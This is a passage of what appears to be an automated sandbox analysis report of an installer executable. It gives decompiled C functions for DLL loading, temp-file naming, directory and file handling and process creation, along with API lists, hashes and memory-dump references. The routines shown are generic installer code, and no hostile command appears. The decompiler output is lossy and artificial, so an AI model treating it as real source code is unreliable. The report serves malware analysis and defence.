				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                            0x004068b1
                            0x004068ba
                            0x004068bc
                            0x004068bc
                            0x004068c0
                            0x004068d3
                            0x004068cd
                            0x004068cd
                            0x004068cd
                            0x004068ec
                            0x00406900
                            0x00406907

                            APIs
                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                            • wsprintfW.USER32 ref: 004068EC
                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: DirectoryLibraryLoadSystemwsprintf
                            • String ID: %s%S.dll$UXTHEME$\
                            • API String ID: 2200240437-1946221925
                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                            • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                            • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 475 40605c-406068 476 406069-40609d GetTickCount GetTempFileNameW 475->476 477 4060ac-4060ae 476->477 478 40609f-4060a1 476->478 480 4060a6-4060a9 477->480 478->476 479 4060a3 478->479 479->480
                            C-Code - Quality: 100%
                            			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                            0x00406062
                            0x00406068
                            0x00406069
                            0x00406069
                            0x0040606e
                            0x0040606f
                            0x00406072
                            0x00406077
                            0x0040607a
                            0x00406084
                            0x00406091
                            0x00406095
                            0x0040609d
                            0x00000000
                            0x00000000
                            0x004060a1
                            0x00000000
                            0x004060a3
                            0x004060a3
                            0x004060a3
                            0x004060a6
                            0x004060a9
                            0x004060a9
                            0x004060ac
                            0x00000000

                            APIs
                            • GetTickCount.KERNEL32 ref: 0040607A
                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CountFileNameTempTick
                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                            • API String ID: 1716503409-678247507
                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                            • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                            • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 481 4015c1-4015d5 call 402da6 call 405eb7 486 401631-401634 481->486 487 4015d7-4015ea call 405e39 481->487 489 401663-4022f6 call 401423 486->489 490 401636-401655 call 401423 call 40653d SetCurrentDirectoryW 486->490 495 401604-401607 call 405aeb 487->495 496 4015ec-4015ef 487->496 502 402c2a-402c39 489->502 490->502 508 40165b-40165e 490->508 505 40160c-40160e 495->505 496->495 499 4015f1-4015f8 call 405b08 496->499 499->495 514 4015fa-401602 call 405a6e 499->514 509 401610-401615 505->509 510 401627-40162f 505->510 508->502 511 401624 509->511 512 401617-401622 GetFileAttributesW 509->512 510->486 510->487 511->510 512->510 512->511 514->505
                            C-Code - Quality: 86%
                            			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8));
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(0x441000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                            0x004015c1
                            0x004015c9
                            0x004015cc
                            0x004015d1
                            0x004015d5
                            0x004015d7
                            0x004015df
                            0x004015e1
                            0x004015e4
                            0x004015ea
                            0x00401604
                            0x00401607
                            0x004015ec
                            0x004015ec
                            0x004015ef
                            0x00000000
                            0x004015fa
                            0x004015fd
                            0x004015fd
                            0x004015ef
                            0x0040160e
                            0x00401615
                            0x00401624
                            0x00401624
                            0x00401617
                            0x0040161a
                            0x00401622
                            0x00000000
                            0x00000000
                            0x00401622
                            0x00401615
                            0x00401627
                            0x0040162b
                            0x0040162c
                            0x004015d7
                            0x00401634
                            0x00401663
                            0x004022f1
                            0x00401636
                            0x00401638
                            0x00401645
                            0x0040164d
                            0x00401655
                            0x0040165b
                            0x0040165b
                            0x00401655
                            0x00402c2d
                            0x00402c39

                            APIs
                              • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                              • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                            • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                            • String ID:
                            • API String ID: 1892508949-0
                            • Opcode ID: a0d011628c810d07a54685ac6612ef99f8e632c27b07218bf1f4fe72126052a1
                            • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                            • Opcode Fuzzy Hash: a0d011628c810d07a54685ac6612ef99f8e632c27b07218bf1f4fe72126052a1
                            • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 517 401389-40138e 518 4013fa-4013fc 517->518 519 401390-4013a0 518->519 520 4013fe 518->520 519->520 521 4013a2-4013a3 call 401434 519->521 522 401400-401401 520->522 524 4013a8-4013ad 521->524 525 401404-401409 524->525 526 4013af-4013b7 call 40136d 524->526 525->522 529 4013b9-4013bb 526->529 530 4013bd-4013c2 526->530 531 4013c4-4013c9 529->531 530->531 531->518 532 4013cb-4013f4 MulDiv SendMessageW 531->532 532->518
                            C-Code - Quality: 69%
                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0);
					}
				}
				return 0;
			}











                            0x0040138a
                            0x004013fa
                            0x0040139b
                            0x004013a0
                            0x00000000
                            0x00000000
                            0x004013a2
                            0x004013a3
                            0x004013ad
                            0x00000000
                            0x00401404
                            0x004013b0
                            0x004013b7
                            0x004013bd
                            0x004013be
                            0x004013c0
                            0x004013c2
                            0x004013b9
                            0x004013b9
                            0x004013ba
                            0x004013ba
                            0x004013c9
                            0x004013cb
                            0x004013f4
                            0x004013f4
                            0x004013c9
                            0x00000000

                            APIs
                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                            • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                            • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                            • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405B20 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 533 405b20-405b51 CreateProcessW 534 405b53-405b5c CloseHandle 533->534 535 405b5f-405b60 533->535 534->535
                            C-Code - Quality: 100%
                            			E00405B20(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430270->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                            0x00405b29
                            0x00405b49
                            0x00405b51
                            0x00405b56
                            0x00000000
                            0x00405b5c
                            0x00405b60

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CloseCreateHandleProcess
                            • String ID:
                            • API String ID: 3712363035-0
                            • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                            • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                            • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                            • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 536 40690a-406924 GetModuleHandleA 537 406930-40693d GetProcAddress 536->537 538 406926-406927 call 40689a 536->538 540 406941-406943 537->540 541 40692c-40692e 538->541 541->537 542 40693f 541->542 542->540
                            C-Code - Quality: 100%
                            			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                            0x00406912
                            0x00406915
                            0x0040691c
                            0x00406924
                            0x00406930
                            0x00000000
                            0x00406937
                            0x00406927
                            0x0040692e
                            0x00000000
                            0x0040693f
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                              • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                              • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                              • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                            • String ID:
                            • API String ID: 2547128583-0
                            • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                            • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                            • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                            • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 543 40602d-406059 GetFileAttributesW CreateFileW
                            C-Code - Quality: 68%
                            			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                            0x00406031
                            0x0040603e
                            0x00406053
                            0x00406059

                            APIs
                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: File$AttributesCreate
                            • String ID:
                            • API String ID: 415043291-0
                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 544 406008-406018 GetFileAttributesW 545 406027-40602a 544->545 546 40601a-406021 SetFileAttributesW 544->546 546->545
                            C-Code - Quality: 100%
                            			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                            0x0040600d
                            0x00406013
                            0x00406018
                            0x00406021
                            0x00406021
                            0x0040602a

                            APIs
                            • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                            • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                            • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 547 405aeb-405af9 CreateDirectoryW 548 405afb-405afd 547->548 549 405aff GetLastError 547->549 550 405b05 548->550 549->550
                            C-Code - Quality: 100%
                            			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                            0x00405af1
                            0x00405af9
                            0x00000000
                            0x00405aff
                            0x00000000

                            APIs
                            • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                            • GetLastError.KERNEL32 ref: 00405AFF
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CreateDirectoryErrorLast
                            • String ID:
                            • API String ID: 1375471231-0
                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                            • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                            • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                            0x004060e3
                            0x004060f3
                            0x004060fb
                            0x00000000
                            0x00406102
                            0x00000000
                            0x00406104

                            APIs
                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
